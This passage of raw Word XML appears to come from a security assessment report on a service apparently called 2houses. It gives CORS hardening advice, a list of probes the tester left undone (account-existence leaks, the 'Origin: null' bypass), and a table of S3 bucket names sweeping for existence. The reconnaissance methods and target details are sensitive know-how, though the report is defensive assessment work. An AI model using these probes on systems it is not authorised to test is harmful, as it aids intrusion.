        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Minimise allowed origins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to explicit hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Minimise allowed methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if the endpoint is POST-only, list only POST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Further probes (I stopped here)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The user asked for no state-changing traffic. What I have NOT done but would in a less-restricted engagement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Confirm the reflective behaviour is endpoint-scoped or global. One additional OPTIONS would do it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>check_registration.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> leaks "account exists" for arbitrary emails (single POST with a throwaway payload — creates no record but would show in access logs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test whether </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Origin: null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also accepted (common bypass for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> iframes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Recommend doing these during a controlled retest in a staging copy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-004 — S3 bucket inventory (confirmed: existing but private)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Low (after confirmation)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Information disclosure (minor) / attack surface inventory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accounts-production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses-production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses-backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmed 2026-04-22 via single HEAD requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Bucket inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A sweep of predictable bucket names returned the following. In S3, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "bucket exists but is private"; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "bucket does not exist".</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Pr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
            <w:shd w:fill="333333"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Interpretation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>accounts-production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>exists, private</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>accounts-staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>exists, private</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>accounts-development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>exists, private</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>2houses-production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>exists, private</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>2houses-backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>exists, private</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>tools-production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>onehouse-production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>my-2houses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>twohouses-production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>2houses-media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
                <w:shd w:val="clear" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>2houses-uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Additionally verified:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
